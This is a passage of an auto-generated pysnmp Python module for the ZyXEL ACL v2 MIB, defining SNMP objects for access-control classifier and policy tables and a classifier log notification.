Counter32, Integer32, Counter64, NotificationType, Bits, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, TimeTicks, iso, Gauge32, Unsigned32, IpAddress, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Integer32", "Counter64", "NotificationType", "Bits", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "TimeTicks", "iso", "Gauge32", "Unsigned32", "IpAddress", "ObjectIdentity")
RowStatus, MacAddress, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "MacAddress", "DisplayString", "TextualConvention")
esMgmt, = mibBuilder.importSymbols("ZYXEL-ES-SMI", "esMgmt")
zyxelAclV2 = ModuleIdentity((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105))
if mibBuilder.loadTexts: zyxelAclV2.setLastUpdated('201207010000Z')
if mibBuilder.loadTexts: zyxelAclV2.setOrganization('Enterprise Solution ZyXEL')
zyxelAclV2ClassifierStatus = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1))
zyxelAclV2PolicyStatus = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2))
zyxelAclV2TrapInfoObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 3))
zyxelAclV2Notifications = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 4))
zyxelAclV2ClassifierTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierTable.setStatus('current')
zyxelAclV2ClassifierEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierEntry.setStatus('current')
zyAclV2ClassifierName = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 1), DisplayString())
if mibBuilder.loadTexts: zyAclV2ClassifierName.setStatus('current')
zyAclV2ClassifierState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 2), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierState.setStatus('current')
zyAclV2ClassifierWeight = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierWeight.setStatus('current')
zyAclV2ClassifierCountState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 4), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierCountState.setStatus('current')
zyAclV2ClassifierLogState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 5), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierLogState.setStatus('current')
zyAclV2ClassifierTimeRange = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierTimeRange.setStatus('current')
zyAclV2ClassifierMatchCount = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierMatchCount.setStatus('current')
zyxelAclV2ClassifierEthernetTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierEthernetTable.setStatus('current')
zyxelAclV2ClassifierEthernetEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierEthernetEntry.setStatus('current')
zyAclV2ClassifierEthernetSourcePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 1), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourcePorts.setStatus('current')
zyAclV2ClassifierEthernetSourceTrunks = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 2), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceTrunks.setStatus('current')
zyAclV2ClassifierEthernetPacketFormat = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("all", 1), ("ethernetIIUntagged", 2), ("ethernetIITagged", 3), ("ethernet802dot3Untagged", 4), ("ethernet802dot3Tagged", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetPacketFormat.setStatus('current')
zyAclV2ClassifierEthernet8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernet8021pPriority.setStatus('current')
zyAclV2ClassifierEthernetInner8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetInner8021pPriority.setStatus('current')
zyAclV2ClassifierEthernetType = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetType.setStatus('current')
zyAclV2ClassifierEthernetSourceMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 7), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceMacAddress.setStatus('current')
zyAclV2ClassifierEthernetSourceMACMask = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 8), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceMACMask.setStatus('current')
zyAclV2ClassifierEthernetDestinationMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 9), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetDestinationMacAddress.setStatus('current')
zyAclV2ClassifierEthernetDestinationMACMask = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 10), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetDestinationMACMask.setStatus('current')
zyxelAclV2ClassifierVlanTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierVlanTable.setStatus('current')
zyxelAclV2ClassifierVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierVlanEntry.setStatus('current')
zyAclV2ClassifierVlanMap1k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap1k.setStatus('current')
zyAclV2ClassifierVlanMap2k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap2k.setStatus('current')
zyAclV2ClassifierVlanMap3k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap3k.setStatus('current')
zyAclV2ClassifierVlanMap4k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap4k.setStatus('current')
zyxelAclV2ClassifierInnerVlanTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierInnerVlanTable.setStatus('current')
zyxelAclV2ClassifierInnerVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierInnerVlanEntry.setStatus('current')
zyAclV2ClassifierInnerVlanMap1k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap1k.setStatus('current')
zyAclV2ClassifierInnerVlanMap2k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap2k.setStatus('current')
zyAclV2ClassifierInnerVlanMap3k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap3k.setStatus('current')
zyAclV2ClassifierInnerVlanMap4k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap4k.setStatus('current')
zyxelAclV2ClassifierIpTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpTable.setStatus('current')
zyxelAclV2ClassifierIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpEntry.setStatus('current')
zyAclV2ClassifierIpPacketLenRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPacketLenRangeStart.setStatus('current')
zyAclV2ClassifierIpPacketLenRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPacketLenRangeEnd.setStatus('current')
zyAclV2ClassifierIpDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDSCP.setStatus('current')
zyAclV2ClassifierIpPrecedence = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPrecedence.setStatus('current')
zyAclV2ClassifierIpToS = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpToS.setStatus('current')
zyAclV2ClassifierIpProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpProtocol.setStatus('current')
zyAclV2ClassifierIpEstablishOnly = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 7), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpEstablishOnly.setStatus('current')
zyAclV2ClassifierIpSourceIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceIpAddress.setStatus('current')
zyAclV2ClassifierIpSourceIpMaskBits = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceIpMaskBits.setStatus('current')
zyAclV2ClassifierIpDestinationIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationIpAddress.setStatus('current')
zyAclV2ClassifierIpDestinationIpMaskBits = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationIpMaskBits.setStatus('current')
zyAclV2ClassifierIpSourceSocketRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceSocketRangeStart.setStatus('current')
zyAclV2ClassifierIpSourceSocketRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceSocketRangeEnd.setStatus('current')
zyAclV2ClassifierIpDestinationSocketRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationSocketRangeStart.setStatus('current')
zyAclV2ClassifierIpDestinationSocketRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationSocketRangeEnd.setStatus('current')
zyxelAclV2ClassifierIpv6Table = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpv6Table.setStatus('current')
zyxelAclV2ClassifierIpv6Entry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpv6Entry.setStatus('current')
zyAclV2ClassifierIPv6DSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DSCP.setStatus('current')
zyAclV2ClassifierIPv6NextHeader = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6NextHeader.setStatus('current')
zyAclV2ClassifierIPv6EstablishOnly = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 3), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6EstablishOnly.setStatus('current')
zyAclV2ClassifierIPv6SourceIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 4), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6SourceIpAddress.setStatus('current')
zyAclV2ClassifierIPv6SourceIpPrefixLength = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6SourceIpPrefixLength.setStatus('current')
zyAclV2ClassifierIPv6DestinationIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 6), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DestinationIpAddress.setStatus('current')
zyAclV2ClassifierIPv6DestinationIpPrefixLength = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DestinationIpPrefixLength.setStatus('current')
zyxelAclV2ClassifierMatchOrder = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("auto", 1), ("manual", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierMatchOrder.setStatus('current')
zyxelAclV2ClassifierLoggingState = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 8), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierLoggingState.setStatus('current')
zyxelAclV2ClassifierLoggingInterval = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierLoggingInterval.setStatus('current')
zyxelAclV2PolicyTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1), )
if mibBuilder.loadTexts: zyxelAclV2PolicyTable.setStatus('current')
zyxelAclV2PolicyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2PolicyName"))
if mibBuilder.loadTexts: zyxelAclV2PolicyEntry.setStatus('current')
zyAclV2PolicyName = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 1), DisplayString())
if mibBuilder.loadTexts: zyAclV2PolicyName.setStatus('current')
zyAclV2PolicyState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 2), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyState.setStatus('current')
zyAclV2PolicyClassifier = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyClassifier.setStatus('current')
zyAclV2PolicyVid = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyVid.setStatus('current')
zyAclV2PolicyEgressPort = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyEgressPort.setStatus('current')
zyAclV2Policy8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2Policy8021pPriority.setStatus('current')
zyAclV2PolicyDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyDSCP.setStatus('current')
zyAclV2PolicyTOS = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyTOS.setStatus('current')
zyAclV2PolicyBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyBandwidth.setStatus('current')
zyAclV2PolicyOutOfProfileDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutOfProfileDSCP.setStatus('current')
zyAclV2PolicyForwardingAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noChange", 1), ("discardThePacket", 2), ("doNotDropTheMatchingFramePreviouslyMarkedForDropping", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyForwardingAction.setStatus('current')
zyAclV2PolicyPriorityAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("noChange", 1), ("setThePackets802dot1Priority", 2), ("sendThePacketToPriorityQueue", 3), ("replaceThe802dot1PriorityFieldWithTheIpTosValue", 4), ("replaceThe802dot1PriorityByInner802dot1Priority", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyPriorityAction.setStatus('current')
zyAclV2PolicyDiffServAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noChange", 1), ("setThePacketsTosField", 2), ("replaceTheIpTosFieldWithThe802dot1PriorityValue", 3), ("setTheDiffservCodepointFieldInTheFrame", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyDiffServAction.setStatus('current')
zyAclV2PolicyOutgoingAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 14), Bits().clone(namedValues=NamedValues(("sendThePacketToTheMirrorPort", 0), ("sendThePacketToTheEgressPort", 1), ("sendTheMatchingFramesToTheEgressPort", 2), ("setThePacketVlanId", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutgoingAction.setStatus('current')
zyAclV2PolicyMeteringState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyMeteringState.setStatus('current')
zyAclV2PolicyOutOfProfileAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 16), Bits().clone(namedValues=NamedValues(("dropThePacket", 0), ("changeTheDscpValue", 1), ("setOutDropPrecedence", 2), ("doNotDropTheMatchingFramePreviouslyMarkedForDropping", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutOfProfileAction.setStatus('current')
zyAclV2PolicyRowstatus = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 17), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyRowstatus.setStatus('current')
zyAclV2PolicyQueueAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noChange", 1), ("sendThePacketToPriorityQueue", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyQueueAction.setStatus('current')
zyAclV2TrapClassifierLogMatchCount = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 3, 1), Integer32())
if mibBuilder.loadTexts: zyAclV2TrapClassifierLogMatchCount.setStatus('current')
zyAclV2ClassifierLogNotification = NotificationType((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 4, 1)).setObjects(("ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"), ("ZYXEL-AclV2-MIB", "zyAclV2TrapClassifierLogMatchCount"))
if mibBuilder.loadTexts: zyAclV2ClassifierLogNotification.setStatus('current')
mibBuilder.exportSymbols("ZYXEL-AclV2-MIB", zyAclV2ClassifierInnerVlanMap1k=zyAclV2ClassifierInnerVlanMap1k, zyAclV2ClassifierIPv6DSCP=zyAclV2ClassifierIPv6DSCP, zyAclV2ClassifierEthernetInner8021pPriority=zyAclV2ClassifierEthernetInner8021pPriority, zyAclV2ClassifierInnerVlanMap4k=zyAclV2ClassifierInnerVlanMap4k, zyAclV2ClassifierEthernetPacketFormat=zyAclV2ClassifierEthernetPacketFormat, zyAclV2ClassifierVlanMap2k=zyAclV2ClassifierVlanMap2k, zyxelAclV2PolicyStatus=zyxelAclV2PolicyStatus, zyAclV2PolicyClassifier=zyAclV2PolicyClassifier, zyxelAclV2ClassifierInnerVlanTable=zyxelAclV2ClassifierInnerVlanTable, zyAclV2ClassifierIpEstablishOnly=zyAclV2ClassifierIpEstablishOnly, zyAclV2ClassifierEthernetType=zyAclV2ClassifierEthernetType, zyAclV2ClassifierEthernetSourceMacAddress=zyAclV2ClassifierEthernetSourceMacAddress, zyAclV2ClassifierIpSourceIpMaskBits=zyAclV2ClassifierIpSourceIpMaskBits, zyAclV2ClassifierEthernetDestinationMacAddress=zyAclV2ClassifierEthernetDestinationMacAddress, zyAclV2PolicyOutOfProfileDSCP=zyAclV2PolicyOutOfProfileDSCP, zyAclV2ClassifierIpDestinationSocketRangeEnd=zyAclV2ClassifierIpDestinationSocketRangeEnd, zyAclV2PolicyEgressPort=zyAclV2PolicyEgressPort, zyAclV2PolicyRowstatus=zyAclV2PolicyRowstatus, zyAclV2ClassifierEthernetSourceTrunks=zyAclV2ClassifierEthernetSourceTrunks, zyxelAclV2ClassifierInnerVlanEntry=zyxelAclV2ClassifierInnerVlanEntry, zyAclV2ClassifierLogNotification=zyAclV2ClassifierLogNotification, zyAclV2PolicyOutgoingAction=zyAclV2PolicyOutgoingAction, zyAclV2ClassifierIpDestinationIpAddress=zyAclV2ClassifierIpDestinationIpAddress, zyAclV2PolicyMeteringState=zyAclV2PolicyMeteringState, zyAclV2ClassifierInnerVlanMap2k=zyAclV2ClassifierInnerVlanMap2k, zyAclV2ClassifierIpPrecedence=zyAclV2ClassifierIpPrecedence, zyAclV2PolicyVid=zyAclV2PolicyVid, zyxelAclV2ClassifierEntry=zyxelAclV2ClassifierEntry, zyAclV2ClassifierIpDestinationIpMaskBits=zyAclV2ClassifierIpDestinationIpMaskBits, zyxelAclV2Notifications=zyxelAclV2Notifications, zyxelAclV2PolicyTable=zyxelAclV2PolicyTable, zyxelAclV2ClassifierMatchOrder=zyxelAclV2ClassifierMatchOrder, zyAclV2ClassifierIpDSCP=zyAclV2ClassifierIpDSCP, zyAclV2ClassifierWeight=zyAclV2ClassifierWeight, zyAclV2ClassifierMatchCount=zyAclV2ClassifierMatchCount, zyAclV2PolicyPriorityAction=zyAclV2PolicyPriorityAction, zyAclV2TrapClassifierLogMatchCount=zyAclV2TrapClassifierLogMatchCount, zyxelAclV2ClassifierEthernetEntry=zyxelAclV2ClassifierEthernetEntry, zyAclV2ClassifierIpPacketLenRangeStart=zyAclV2ClassifierIpPacketLenRangeStart, zyAclV2ClassifierEthernetSourceMACMask=zyAclV2ClassifierEthernetSourceMACMask, zyAclV2ClassifierEthernetDestinationMACMask=zyAclV2ClassifierEthernetDestinationMACMask, zyAclV2ClassifierVlanMap3k=zyAclV2ClassifierVlanMap3k, zyAclV2ClassifierTimeRange=zyAclV2ClassifierTimeRange, zyxelAclV2ClassifierIpv6Entry=zyxelAclV2ClassifierIpv6Entry, zyAclV2ClassifierIPv6EstablishOnly=zyAclV2ClassifierIPv6EstablishOnly, zyAclV2ClassifierIPv6DestinationIpPrefixLength=zyAclV2ClassifierIPv6DestinationIpPrefixLength, zyxelAclV2ClassifierIpEntry=zyxelAclV2ClassifierIpEntry, zyAclV2ClassifierIpToS=zyAclV2ClassifierIpToS, zyAclV2ClassifierEthernetSourcePorts=zyAclV2ClassifierEthernetSourcePorts, zyAclV2PolicyQueueAction=zyAclV2PolicyQueueAction, 